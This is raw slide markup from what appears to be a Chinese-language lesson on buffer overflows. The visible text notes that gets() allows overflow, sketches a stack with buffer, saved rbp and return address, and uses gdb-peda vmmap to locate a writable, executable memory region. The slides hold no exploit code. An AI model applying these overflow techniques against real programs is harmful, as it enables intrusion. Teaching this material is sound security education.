                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{935709F7-FAD9-400E-9846-780AE721F244}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="324704" y="1638114"/>
            <a:ext cx="3341773" cy="1318150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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圓角矩形 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84C1E4A-0C0F-4FF0-999E-2E404BC5FFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269162" y="2094051"/>
            <a:ext cx="985766" cy="205266"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:pr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8" name="直線單箭頭接點 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1057BD8-DAA8-4081-8B1A-CF4F78B86119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2254928" y="2193047"/>
            <a:ext cx="3778191" cy="31115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A467E814-17E6-4DE4-A6D2-20A43C0BE625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="2319531"/>
            <a:ext cx="4459550" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Name: a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>字串存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>obj.name</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="直線單箭頭接點 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BA8751-8D8D-4DC2-A344-CEB22E3A0A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1779801" y="3492655"/>
            <a:ext cx="4253318"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3AF31B07-33B5-4061-8133-787FB0EFC26B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033119" y="3316866"/>
            <a:ext cx="2403629" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>可輸入的字串長度</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="圖片 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{911E9550-0398-431E-AEE2-ABAE5B909C44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269162" y="3806958"/>
            <a:ext cx="888112" cy="312612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="接點: 肘形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE6F8C7-AFF4-42C4-8D22-D04BCDAD134F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4613524" y="232616"/>
            <a:ext cx="1256005" cy="616849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41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B9362D8-15A1-4E55-A16D-0CB147C7B1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359850" y="1222466"/>
            <a:ext cx="4039164" cy="2229161"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DFF0CE8-92A8-42BB-B388-989E994163B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6720396" y="2251578"/>
            <a:ext cx="1862091" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Try your best:s</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6939C757-4851-4D93-B305-D8C29CB15C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359850" y="2337046"/>
            <a:ext cx="4039164" cy="111458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箭號: 向上 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A62DDD37-E209-4059-9FD3-2B827001A13F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2894902" y="3275780"/>
            <a:ext cx="257453" cy="958789"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3620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CB183B3C-D3FD-4613-84CC-6A98C5D54018}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359850" y="4268986"/>
            <a:ext cx="3327559" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>函數接收字串</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>可進行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>buffer overflow</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="箭號: 向右 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B7843C5-102B-4E80-81D1-69533D51643C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3379432" y="2337045"/>
            <a:ext cx="3340964" cy="204187"/>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 name="群組 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32EC46D3-D07A-42D1-A018-781A4DE7A59A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6001304" y="3364637"/>
            <a:ext cx="2337788" cy="2095692"/>
            <a:chOff x="4968681" y="1971417"/>
            <a:chExt cx="3595163" cy="3666057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B4FF99E-9E51-4FAF-BBF8-A4AD1E0BF5CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385187" y="5009321"/>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t>RETURN ADDRESS</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3422C872-5A0C-4728-B5E6-981BC3BDA236}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385187" y="4335936"/>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Saved </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
                <a:t>rbp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E62006C7-625C-4AEB-97BA-BDF5B873772C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6385185" y="1971417"/>
              <a:ext cx="2178657" cy="23192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sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="矩形 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2163B362-6EBE-43E4-B207-E358276B097F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5212398" y="2970888"/>
              <a:ext cx="1070379" cy="646084"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{489C8D1D-7702-4CB4-B78E-4D2FB490615E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5316591" y="4290703"/>
              <a:ext cx="865770" cy="646084"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
                <a:t>0x8</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="直線接點 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A19756C-B55A-49AB-A155-03D67083014A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968682" y="1993440"/>
              <a:ext cx="137372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0A47C978-DF34-455D-A02C-F821CBFDAD00}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968681" y="4290704"/>
              <a:ext cx="137372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FF83446C-E118-4830-AA9A-2A8FFEE18255}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4968681" y="4959875"/>
              <a:ext cx="137372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0" name="箭號: 向右 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB4C371F-2F26-4F00-8DC7-F9F45308BB6D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="7157442" y="3020446"/>
            <a:ext cx="1045566" cy="246498"/>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77603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A66F41-C978-4528-A248-87E11C4381B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>尋找程式可執行區段</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>dynamic analysis == &gt; gdb-peda</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70ECC1F1-FAE1-4CBC-9B05-F2D487CFD569}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vmmap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>權限 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x00601000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x00602000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>為可以寫入區段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ABD7D04-10AD-4BAA-AF44-A4B40516FC71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="2885242"/>
            <a:ext cx="8497486" cy="3688581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48440035-34F6-4842-BDD1-2B405D6490CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202919" y="3648722"/>
            <a:ext cx="7656996" cy="19087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3629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D2E068-07C7-4E48-90A0-0092EF561BDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>什麼是程式漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92709C8B-719A-48A4-A8C7-AFC0CBCD5D83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指電腦系統安全方面的缺陷，使得系統或其應用資料的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>保密性、完整性、可用性、存取控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>等面臨威脅</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>許多安全漏洞是程式錯誤導致的，此時可叫做安全錯誤（英語：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Security bug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>），但並不是所有的安全隱患都是程式安全錯誤導致的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文字方塊 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C4582D-2E38-4C43-A373-BC94E82E2859}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6488668"/>
            <a:ext cx="6094520" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>漏洞 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>維基百科，自由的百科全書 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>(wikipedia.org)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3471836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F449680-3CB9-4AF4-AAF8-C1A4F0623459}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="660506" y="63612"/>
            <a:ext cx="3693357" cy="2703251"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F606299-1546-49F3-8F9A-276B3CA4C731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="660506" y="1512693"/>
            <a:ext cx="1802167" cy="19887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E4C9EAD6-2F17-489B-AA8A-00294AB519C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700714" y="3429000"/>
            <a:ext cx="6790571" cy="3377833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DE3A515-8872-435A-8434-9050164DD776}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700714" y="4154749"/>
            <a:ext cx="6079302" cy="1864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F791E7B1-953E-4E65-B671-C24E94BA396A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2700714" y="3059668"/>
            <a:ext cx="6103398" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>0x006010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
